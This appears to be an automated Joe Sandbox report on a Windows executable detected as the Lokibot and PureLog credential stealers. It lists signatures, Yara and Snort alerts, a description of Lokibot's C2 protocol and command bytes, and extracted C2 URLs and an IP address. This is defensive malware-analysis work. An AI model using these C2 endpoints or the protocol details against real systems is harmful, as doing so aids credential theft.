Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SCB#89940578.exe

Overview

General Information

Sample name:SCB#89940578.exe
Analysis ID:1431960
MD5:8bdfe306f813ba1a65ecf6e1da4085c1
SHA1:7bca83400323c71ee5bd1d655004a4a762e1c71b
SHA256:857fd5543f14e01ea3b08d3aca6ee6763042a48d7b04c9f035a4a37a4d2e0039
Tags:exeLoki
Infos:

Detection

Lokibot, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SCB#89940578.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\SCB#89940578.exe" MD5: 8BDFE306F813BA1A65ECF6E1DA4085C1)
    • SCB#89940578.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\SCB#89940578.exe" MD5: 8BDFE306F813BA1A65ECF6E1DA4085C1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=posts.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x1e5e8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 32 entries
            SourceRuleDescriptionAuthorStrings
            0.2.SCB#89940578.exe.7be0000.10.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.SCB#89940578.exe.3b19970.8.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.SCB#89940578.exe.7be0000.10.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.SCB#89940578.exe.3b19970.8.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.SCB#89940578.exe.4756290.5.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                      Click to see the 57 entries
                      No Sigma rule has matched
                      Timestamp:04/26/24-04:42:41.660723
                      SID:2024313
                      Source Port:49767
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:37.043735
                      SID:2021641
                      Source Port:49764
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:38.519329
                      SID:2024313
                      Source Port:49804
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:41.660723
                      SID:2024318
                      Source Port:49767
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:20.116742
                      SID:2025381
                      Source Port:49753
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:46.212974
                      SID:2024313
                      Source Port:49770
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:21.940707
                      SID:2024318
                      Source Port:49795
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:40.002816
                      SID:2025381
                      Source Port:49805
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:01.472637
                      SID:2025381
                      Source Port:49781
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:43.312556
                      SID:2025381
                      Source Port:49768
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:17.632927
                      SID:2021641
                      Source Port:49792
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:46.212974
                      SID:2024318
                      Source Port:49770
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:21.940707
                      SID:2024313
                      Source Port:49795
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:05.836233
                      SID:2024313
                      Source Port:49739
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:13.266385
                      SID:2021641
                      Source Port:49789
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:08.959356
                      SID:2025381
                      Source Port:49786
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:10.160803
                      SID:2024318
                      Source Port:49742
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:55.707371
                      SID:2024313
                      Source Port:49777
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:12.565966
                      SID:2025381
                      Source Port:49743
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:57.146160
                      SID:2025381
                      Source Port:49778
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:04.426692
                      SID:2021641
                      Source Port:49736
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:10.160803
                      SID:2024313
                      Source Port:49742
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:55.707371
                      SID:2024318
                      Source Port:49777
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:29.146660
                      SID:2024313
                      Source Port:49759
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:02.891159
                      SID:2021641
                      Source Port:49782
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:41.435996
                      SID:2021641
                      Source Port:49806
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:29.146660
                      SID:2024318
                      Source Port:49759
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:16.174844
                      SID:2025381
                      Source Port:49791
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:08.768305
                      SID:2021641
                      Source Port:49741
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:32.693379
                      SID:2025381
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:23.393350
                      SID:2025381
                      Source Port:49796
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:30.595490
                      SID:2021641
                      Source Port:49801
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:19.056808
                      SID:2024313
                      Source Port:49793
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:10.461205
                      SID:2024318
                      Source Port:49787
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:52.043341
                      SID:2025381
                      Source Port:49813
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:14.708232
                      SID:2021641
                      Source Port:49790
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:05.708325
                      SID:2021641
                      Source Port:49784
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:27.753457
                      SID:2021641
                      Source Port:49799
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:19.056808
                      SID:2024318
                      Source Port:49793
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:42.908989
                      SID:2025381
                      Source Port:49807
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:10.461205
                      SID:2024313
                      Source Port:49787
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:44.797094
                      SID:2021641
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:21.613500
                      SID:2021641
                      Source Port:49754
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:49.953966
                      SID:2024318
                      Source Port:49772
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:26.179565
                      SID:2024318
                      Source Port:49757
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:49.953966
                      SID:2024313
                      Source Port:49772
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:26.179565
                      SID:2024313
                      Source Port:49757
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:35.607137
                      SID:2025381
                      Source Port:49763
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:26.329932
                      SID:2025381
                      Source Port:49798
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:00.052049
                      SID:2024313
                      Source Port:49780
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:24.904349
                      SID:2021641
                      Source Port:49797
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:29.172203
                      SID:2025381
                      Source Port:49800
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:47.670237
                      SID:2025381
                      Source Port:49771
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:18.687770
                      SID:2024313
                      Source Port:49750
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:07.513137
                      SID:2024318
                      Source Port:49785
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:14.041821
                      SID:2024318
                      Source Port:49744
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:18.687770
                      SID:2024318
                      Source Port:49750
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:24.705958
                      SID:2021641
                      Source Port:49756
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:14.041821
                      SID:2024313
                      Source Port:49744
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:34.173942
                      SID:2021641
                      Source Port:49762
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:00.052049
                      SID:2024318
                      Source Port:49780
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:02.935480
                      SID:2025381
                      Source Port:49735
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:58.597395
                      SID:2024313
                      Source Port:49779
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:08.768305
                      SID:2025381
                      Source Port:49741
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:58.597395
                      SID:2024318
                      Source Port:49779
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:07.513137
                      SID:2024313
                      Source Port:49785
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:41.660723
                      SID:2021641
                      Source Port:49767
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:19.056808
                      SID:2025381
                      Source Port:49793
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:42.908989
                      SID:2024313
                      Source Port:49807
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:21.940707
                      SID:2021641
                      Source Port:49795
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:52.847994
                      SID:2025381
                      Source Port:49774
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:04.288590
                      SID:2025381
                      Source Port:49783
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:07.242464
                      SID:2024318
                      Source Port:49740
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:07.242464
                      SID:2024313
                      Source Port:49740
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:34.068335
                      SID:2025381
                      Source Port:49802
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:17.632927
                      SID:2025381
                      Source Port:49792
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:44.358398
                      SID:2024318
                      Source Port:49808
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:38.508836
                      SID:2024318
                      Source Port:49765
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:35.596260
                      SID:2025381
                      Source Port:49803
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:13.266385
                      SID:2025381
                      Source Port:49789
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:38.508836
                      SID:2024313
                      Source Port:49765
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:23.188583
                      SID:2025381
                      Source Port:49755
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:11.850756
                      SID:2024313
                      Source Port:49788
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:20.116742
                      SID:2021641
                      Source Port:49753
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:42.908989
                      SID:2024318
                      Source Port:49807
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:20.496255
                      SID:2021641
                      Source Port:49794
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:17.251353
                      SID:2024313
                      Source Port:49747
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:30.595490
                      SID:2024318
                      Source Port:49801
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:45.956580
                      SID:2025381
                      Source Port:49809
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:02.935480
                      SID:2021641
                      Source Port:49735
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:30.595490
                      SID:2024313
                      Source Port:49801
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:11.850756
                      SID:2024318
                      Source Port:49788
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:17.251353
                      SID:2024318
                      Source Port:49747
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:51.405219
                      SID:2025381
                      Source Port:49773
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:14.708232
                      SID:2024313
                      Source Port:49790
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:01.472637
                      SID:2024318
                      Source Port:49781
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:05.708325
                      SID:2024318
                      Source Port:49784
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:46.212974
                      SID:2025381
                      Source Port:49770
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:05.708325
                      SID:2024313
                      Source Port:49784
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:57.146160
                      SID:2024318
                      Source Port:49778
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:57.146160
                      SID:2024313
                      Source Port:49778
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:35.607137
                      SID:2021641
                      Source Port:49763
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:39.893817
                      SID:2021641
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:44.797094
                      SID:2024318
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:05.836233
                      SID:2025381
                      Source Port:49739
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:10.160803
                      SID:2025381
                      Source Port:49742
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:44.797094
                      SID:2024313
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:54.249806
                      SID:2024313
                      Source Port:49775
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:26.179565
                      SID:2021641
                      Source Port:49757
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:54.249806
                      SID:2024318
                      Source Port:49775
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:01.472637
                      SID:2024313
                      Source Port:49781
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:49.953966
                      SID:2021641
                      Source Port:49772
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:40.002816
                      SID:2021641
                      Source Port:49805
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:04.426692
                      SID:2025381
                      Source Port:49736
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:15.814851
                      SID:2025381
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:14.708232
                      SID:2024318
                      Source Port:49790
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:44.358398
                      SID:2021641
                      Source Port:49808
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:24.904349
                      SID:2024318
                      Source Port:49797
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:48.980951
                      SID:2021641
                      Source Port:49811
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:24.904349
                      SID:2024313
                      Source Port:49797
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:24.705958
                      SID:2024313
                      Source Port:49756
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:27.665907
                      SID:2025381
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:47.482327
                      SID:2024318
                      Source Port:49810
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:18.687770
                      SID:2021641
                      Source Port:49750
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:50.432496
                      SID:2025381
                      Source Port:49812
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:16.174844
                      SID:2021641
                      Source Port:49791
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:37.043735
                      SID:2025381
                      Source Port:49764
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:27.753457
                      SID:2025381
                      Source Port:49799
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:34.173942
                      SID:2024313
                      Source Port:49762
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:24.705958
                      SID:2024318
                      Source Port:49756
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:58.597395
                      SID:2021641
                      Source Port:49779
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:41.435996
                      SID:2025381
                      Source Port:49806
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:47.482327
                      SID:2024313
                      Source Port:49810
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:38.519329
                      SID:2024318
                      Source Port:49804
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:14.041821
                      SID:2021641
                      Source Port:49744
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:34.173942
                      SID:2024318
                      Source Port:49762
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:43:07.513137
                      SID:2021641
                      Source Port:49785
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:27.665907
                      SID:2024318
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:42:32.693379
                      SID:2024313
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
